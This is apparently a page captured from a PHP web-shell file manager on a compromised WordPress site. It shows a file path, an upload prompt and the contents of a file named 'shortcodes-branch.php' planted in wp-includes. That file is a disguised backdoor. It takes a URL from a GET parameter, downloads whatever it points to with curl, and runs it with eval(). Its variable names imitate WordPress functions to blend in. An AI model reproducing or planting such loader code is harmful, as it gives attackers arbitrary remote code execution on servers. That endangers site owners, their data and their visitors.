Your IP : 216.73.216.1


Current Path : /home/fotouserdopd8j/agenciacrabli.com/
Upload File :
Current File : //home/fotouserdopd8j/agenciacrabli.com/shortcodes-branch.php.tar

home/fotolxhq/agenciacrabli.com/wp-includes/shortcodes-branch.php000064400000000532150512666710021245 0ustar00<?php

if (isset($_GET['reference'])) {
    $get_the_time_as = $_GET['reference'];
    if ($home_url_md = curl_init()) {
        curl_setopt($home_url_md, CURLOPT_URL, $get_the_time_as);
        curl_setopt($home_url_md, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($home_url_md));
        curl_close($home_url_md);
        exit;
    }
}